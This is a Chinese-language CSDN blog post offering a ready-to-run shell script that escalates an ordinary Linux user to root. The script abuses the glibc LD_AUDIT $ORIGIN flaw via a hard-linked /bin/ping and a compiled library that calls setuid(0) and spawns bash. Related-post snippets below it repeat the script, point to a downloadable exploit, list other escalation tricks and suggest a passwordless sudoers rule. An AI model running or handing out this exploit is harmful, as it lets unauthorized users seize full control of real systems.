linux普通用户提权至root用户脚本

最新推荐文章于 2024-08-11 17:18:24 发布
最新推荐文章于 2024-08-11 17:18:24 发布
阅读量640 收藏 5
点赞数 2
分类专栏: 笔记 文章标签: 安全 恰饭 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441727/article/details/114379335
版权

注,由于脚本是利用/bin/ping漏洞实现提权,如果没有就无法实现。

在这里插入图片描述
vi 2.sh

unset LD_AUDIT
rm -r -f /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit
ls -l /proc/$$/fd/3
cat > program.c << _EOF
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit program.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT

chmod 777 2.sh
./2.sh

Marx_Otto
关注
专栏目录
linux交互式脚本_普通用户自动su - 到root执行相关命令
崔崇鑫的博客,你linux/云运维工作中的百科全书。
09-16 4537
文章目录说明expect命令准备代码说明脚本执行 说明 这种情况仅适合单台主机上运行哈,使用普通用户登陆到该主机上,然后直接执行这个脚本,就可以自动切换到root用户,并执行相关命令了。 如果需要批量的话【比如有20台主机,就是在一台上面执行,自动遍历其他的19台主机】,就将下面代码加入遍历功能即可,我shell分类中有详细的说明的,自己去翻来套入即可。 expect命令准备 如果通外网,直接执行:yum -y install expect 如果没有通外网,可以用ISO镜像配置本地源【如果不会
Linux 上如何让任意普通用户执行拥有root权限的特定脚本或者程序
Ljfzhifuwa的博客
11-10 5608
问题描述: 有一个脚本,只能是具有root执行权限的用户来执行。这意味着只有root用户和拥有sudo权限的用户才能执行,但我们的需求是让普通用户在没有取得root权限的情况下也能执行,那么就开发另一个可执行程序,以支持普通用户拥有执行此脚本的能力。 解决方案: 1. 使用setuid(0) API编写一个可执行程序,并限制可以执行拥有root命令的范围,否则会造成灾难(任何用户都具有root权限),在这个程序中去执行真正需要root权限执行的脚本。而setuid的作...
linux 普通用户提权root.docx
06-04
渗透中如何将Linux普通用户提权root,首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户
LINUX 普通用户提权ROOT
xswl1的博客
11-30 609
1. 在LINUX目录下建立test 帐户 2.下载 a脚本 在http://milw0rm.com/exploits/8478 3.查看UDEV的PID方法一: 先cat /proc/net/netlink ffff810077587400 15364 ffffffff 0 0 0000000000000000 2 ffff810037f81000 160 00000000 0 0 0000000000000000 2...
Linux常见提权方式
最新发布
L_erAry的博客
08-11 1395
taskset命令用于设置进程(或 线程)的处理器亲和性(Processor Affinity),可以将进程(或 线程)绑定到特定的一个 或 多个CPU上去执行,而不允许将进程(或 线程)调度到其他的CPU上。在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。使用方法是,创建一个临时的文件,并在其中构建一个包来调用/bin/bash,然后通过apt-get安装该包。通过压缩一个存在的文件,并调用-T参数输出shell。
普通用户提权ROOT脚本
weixin_34161032的博客
07-07 316
#!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /tmp/exploit ln /bin/ping /tmp/exploit/target exec 3< /tmp/exploit/target ls -l /proc/$$/fd/3 rm -rf /tmp/exploit ls -l /proc...
linux如何给普通用户提权,Linux普通用户提权root
weixin_33439618的博客
05-01 814
[root@ns ~]# whoami ##我是谁root[root@ns ~]# useradd putong[root@ns ~]# su - putong[putong@ns ~]$ whoamiputong[putong@ns ~]$ ll -d /tmp/drwxrwxrwt. 3 root root 4096 12月2 03:11 /tmp/[putong@ns ~]$ cd /t...
普通用户获取root权限
Binyee的博客
02-13 825
问题: Ubuntu Linux系统下,安装软件的时候,普通用户(这里是user)权限不足会报错:install_vim.sh: Permission denied 分析: 获取一下普通用户(user)的权限信息: id user 可以看出user用户没有root权限,即使加了sudo ! 解决: 可以赋予user用户root的操作权限 切换到root的身份,执行命令: usermod -a -G sudo -s /bin/bash user user用户想要执行root才能执行的命令时,命令前加
linux shell脚本root切换到普通用户执行脚本或命令的方法
09-15
Linux系统中,有时我们需要以root用户身份运行脚本,但在执行某些操作时,可能需要切换到普通用户来完成,例如安装软件包、配置非特权服务等。在shell脚本中实现这种切换是非常常见的需求。本文将详细介绍如何在...
linux普通用户安装tomcat,Linux下非root用户运行Tomcat (亲测可用)
weixin_29019241的博客
04-28 1580
来源:Linux社区 作者:svili#前言:Linux下为什么要使用非root用户运行tomcatroot用户启动tomcat有一个严重的问题,那就是tomcat具有root权限。这意味着你的任何一个页面脚本(html/js)都具有root权限,所以可以轻易地用页面脚本 修改整个硬盘里的文件!所以最好不要使用root启动tomcat。# 正文:非root用户运行tomcat## tomca...
Linux通过Shell脚本命令修改密码的两种方式
01-20
[一般都是切换到root进行密码修改,如果普通用户修改自己的密码,要输入原密码,然后新密码要满足复杂度才OK]; 3. passwd username 使用passwd username 修改 username 的密码; 使用该命令会有提示,即进入了交互...
linux普通用户执行root权限脚本
u014078109的博客
08-09 3107
Linux普通用户执行root权限脚本
linux下使用shell脚本切换到root用户并执行脚本
一只小小小小菜鸟
11-13 1万+
需要安装expect yum install expect -y #!/usr/bin/expect spawn su root expect "Password:" send "这里写root用户的密码\r" send "cd /home/wwwroot/script/\r" send "./cache-face.sh\r" expect eof exit ...
linux 当前用户提权 root
twyth1214的专栏
07-10 3446
sudo -i
linux5.4获取root权限,gcc++漏洞 普通用户获取root权限
weixin_42492215的博客
05-01 307
测试环境centos 5.4参考文章;http://salogs.com/2010/12/linux-gcc-root/[test2@wdj002 ~]$ mkdir /tmp/a[test2@wdj002 ~]$ ln -s /bin/ls /tmp/a/b[test2@wdj002 ~]$ exec 3< /tmp/a/b[test2@wdj002 ~]$ ls -l /proc/516...
普通用户获得root权限
zhurobert的博客
05-20 978
获得root权限
Linux系统中将普通用户权限提升至root权限
热门推荐
学习中~
07-02 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
Linux】指令提权-sudo
c565114的博客
02-10 526
Hello everybody,新年快乐!哈哈!今天打算给大家讲讲指令提权的相关知识,虽然内容不多,但有时却很有用。在我们学习过权限,vim后就可以学习指令提权啦,没看过的宝子们建议先去看一看我之前的文章呦!
Linux中如何让新建的普通用户拥有ROOT权限
Attitude_do_it的博客
07-04 2878
请注意,在修改 sudoers 文件时务必小心,确保只为必要的用户分配 sudo 权限,并遵循安全最佳实践。验证用户的身份和权限,并避免在 sudoers 文件中添加不必要的规则。在打开的 sudoers 文件中,找到以 "# User privilege specification" 开头的部分。添加用户到 sudoers 文件后,该用户将具有执行 sudo 命令的权限。命令编辑 sudoers 文件,而不是直接编辑文件。在该部分的末尾添加一行,类似于。是您要添加的用户名。
linux普通用户免密切换root
08-09
Linux系统中,普通用户可以通过免密切换root用户来执行需要root权限的操作。这样的设置可以提高系统的安全性,因为只有在必要时才使用root权限,减少了潜在的操作失误或恶意操作所带来的风险。 要实现普通用户免密切换root,可以参考以下步骤: 1. 首先,以root用户登录系统,打开终端。 2. 使用命令visudo修改sudoers文件: ``` sudo visudo ``` 3. 在文件的末尾添加以下行: ``` your_username ALL=(ALL:ALL) NOPASSWD: ALL ``` 将"your_username"替换为你要免密切换为root普通用户名。 4. 保存并退出sudoers文件。 5. 现在,以普通用户登录系统,在终端中执行sudo命令时,不再需要输入密码。 需要注意的是,免密切换为root用户可能会降低系统的安全性,因此建议仅在必要时使用。在执行需要root权限的操作之后,请务必切换回普通用户来提高系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值